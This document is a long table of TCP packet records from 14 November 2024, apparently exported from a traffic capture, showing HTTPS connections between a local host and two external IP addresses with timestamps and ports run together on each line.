                                                                                                                                                                                                            Nov 14, 2024 12:19:28.149543047 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.149626017 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.169446945 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.180073977 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.215328932 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.223355055 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.728929996 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.728959084 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.728992939 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729003906 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729002953 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729029894 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729043007 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729070902 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.729125977 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744402885 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744426966 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744482994 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744507074 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744564056 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744595051 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744607925 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744626045 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744626045 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744626045 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744647026 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.744673967 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846043110 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846060991 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846148014 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846164942 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846224070 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846565008 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846698046 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846756935 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.846756935 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.848916054 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.848916054 CET49794443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.848932028 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.848941088 CET44349794104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861506939 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861529112 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861603975 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861635923 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861690998 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861869097 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861937046 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861942053 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.861969948 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862000942 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862021923 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862314939 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862328053 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862340927 CET49793443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:28.862345934 CET44349793104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.040553093 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.040589094 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.040920973 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.041208029 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.041220903 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.045538902 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.045583963 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.045653105 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.046025038 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.046040058 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.656693935 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.656887054 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.658921003 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.659001112 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.672260046 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.672286987 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.673203945 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.673434973 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.673466921 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.673738003 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.674981117 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.675017118 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.675157070 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.675575018 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.675609112 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:29.675658941 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.118693113 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.118804932 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.118900061 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.119965076 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.120018005 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.762671947 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.762767076 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.762820005 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.772559881 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.772614002 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.772650003 CET49803443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.772669077 CET44349803188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.795911074 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796032906 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796084881 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796287060 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796317101 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796572924 CET49802443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.796578884 CET44349802188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.868740082 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.868777990 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.868839025 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.869256020 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.869271040 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.890023947 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.890043974 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.890106916 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.890510082 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.890520096 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.960163116 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.960383892 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.961764097 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.961793900 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:30.962090015 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.008892059 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.019840956 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.067329884 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.478159904 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.478233099 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.479603052 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.479614973 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.479851007 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.491200924 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.491264105 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.491331100 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.496043921 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.496126890 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.497870922 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.497895956 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.498132944 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.507834911 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.507868052 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.507908106 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561597109 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561625957 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561650991 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561664104 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561686039 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561697006 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561716080 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561744928 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.561774969 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563033104 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563079119 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563117981 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563119888 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563159943 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563179016 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563455105 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563472033 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563483000 CET49814443192.168.2.10104.102.49.254
                                                                                                                                                                                                            Nov 14, 2024 12:19:31.563488960 CET44349814104.102.49.254192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432209015 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432271957 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432307005 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432329893 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432341099 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432358027 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432419062 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432427883 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432466984 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432472944 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432671070 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432704926 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432724953 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432732105 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.432794094 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436192036 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436245918 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436280012 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436302900 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436311960 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436371088 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436378956 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.436973095 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.477674961 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.477674961 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549140930 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549232006 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549266100 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549285889 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549299002 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549355984 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549362898 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549376011 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549434900 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549685955 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549704075 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549722910 CET49818443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.549731016 CET44349818188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.699695110 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.699806929 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.699904919 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.700280905 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.700316906 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808024883 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808077097 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808105946 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808132887 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808170080 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808218956 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808218956 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808264971 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808326960 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808347940 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808485031 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808510065 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808526039 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808535099 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808577061 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808583975 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808645964 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.808703899 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.814234972 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.814248085 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.814263105 CET49816443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:33.814270020 CET44349816188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.018305063 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.018373013 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.018454075 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.018876076 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.018887997 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.410190105 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.410278082 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.412198067 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.412209034 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.412539005 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.414550066 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.415323973 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.415352106 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.941678047 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.941754103 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.943500996 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.943519115 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.943815947 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.945189953 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.945332050 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:34.945363998 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.781080008 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.781160116 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.781307936 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.781475067 CET49839443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.781493902 CET44349839188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.913783073 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.913832903 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.914113045 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.914277077 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:39.914292097 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.521795988 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.521903038 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.523205042 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.523216009 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.523458958 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.524915934 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.525111914 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.525140047 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.525197029 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:40.567337990 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.595983982 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.596071005 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.596155882 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.596426964 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.596669912 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.596728086 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.638103962 CET49835443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.638135910 CET44349835188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.640248060 CET49867443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.640273094 CET44349867188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.805099010 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.805150032 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.805223942 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.805496931 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.805516958 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.870979071 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.871016979 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.871082067 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.871459007 CET49887443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:42.871471882 CET44349887188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.416673899 CET44349883188.114.97.3192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.416747093 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.417928934 CET49883443192.168.2.10188.114.97.3
                                                                                                                                                                                                            Nov 14, 2024 12:19:43.417936087 CET44349883188.114.97.3192.168.2.10
